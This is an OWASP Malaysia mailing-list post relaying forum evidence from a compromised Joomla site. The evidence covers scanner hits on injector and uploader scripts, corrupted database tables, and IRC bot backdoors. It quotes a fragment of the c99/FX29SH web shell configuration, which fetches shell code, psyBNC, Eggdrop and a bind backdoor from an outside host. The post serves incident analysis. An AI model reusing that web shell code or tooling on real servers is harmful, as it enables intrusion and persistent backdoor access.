Team, A forum post we can refer, what the cracker/s do to our servers.
http://forum.joomla.org/viewtopic.php?p=2518912&sid=1f09664d13627db3131ef72b6cccbc71#p2518912 One of the post "You also need to remove every file, cron job, sub domains, directories, etc. from your domain." "mmmmmmmm, me thought that was done in the first place" Site was restored from site backups which are infected. I've downloaded the backups I have from cPanel, unzipped them and scanned them with Norton anti-virus (I'm on a Mac). I did the same with the public_HTML folder. The backups had trojans, Take a closer look at some of the posts. While it is possible that the server has another account hacked, it is likely originating from this account. There are several scripts here an injector script and an uploader script: HEX}base64.inject.unclassed.3 : ./media/system/cfg.php {HEX}php.uploader.max.523 : ./media/system/upload.php Evidence the hacker messed with or has attempted to mess with the database: hableda1_jo151.jos_session warning : Table is marked as crashed warning : 1 client is using or hasn't closed the table properly warning : Found 1128996 deleted space in delete link chain. Should be 1167464 error : Found 442 deleted rows in delete link chain. Should be 457 hableda1_jo151.jos_content warning : 1 client is using or hasn't closed the table properly status : OK error : record delete-link-chain corrupted error : Corrupt Evidence that hacker has installed or linked to c99, and other scripts: #$sh_mainurl = "http://localhost/FX29SH/";; $sh_mainurl = "http://uaedesign.com/xml/";; $fx29sh_updateurl = $sh_mainurl."c99_update.php"; $fx29sh_sourcesurl = $sh_mainurl."c99.txt"; $sh_sourcez = array( "Fx29Sh" => array($sh_mainurl."c99.txt","c99.php"), "psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"), "Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"), "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"), Evidence of IRC installed and active: A few updates: I've downloaded and scanned my backup that was just generated and this virus was found in the homedir.tar and the hableda1.tar.gz (I scanned both the zipped and unzipped files): backdoor.IRC.bot. Evidence the attempts to use the site for malware/spam/other purposes continue: There is a lot of POST requests to the index page from the IP address xxx.xxx.xxx.xxx These are the reasons I stated what I did as a plan of action. _______________ We can discuss this at OWASP.my Discussion Group In Facebook https://www.facebook.com/groups/owaspmy/ _______________________________________________ OWASP-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.my OWASP Malaysia Facebook http://www.facebook.com/OWASP.Malaysia OWASP Malaysia Twitter #owaspmy http://www.twitter.com/owaspmy
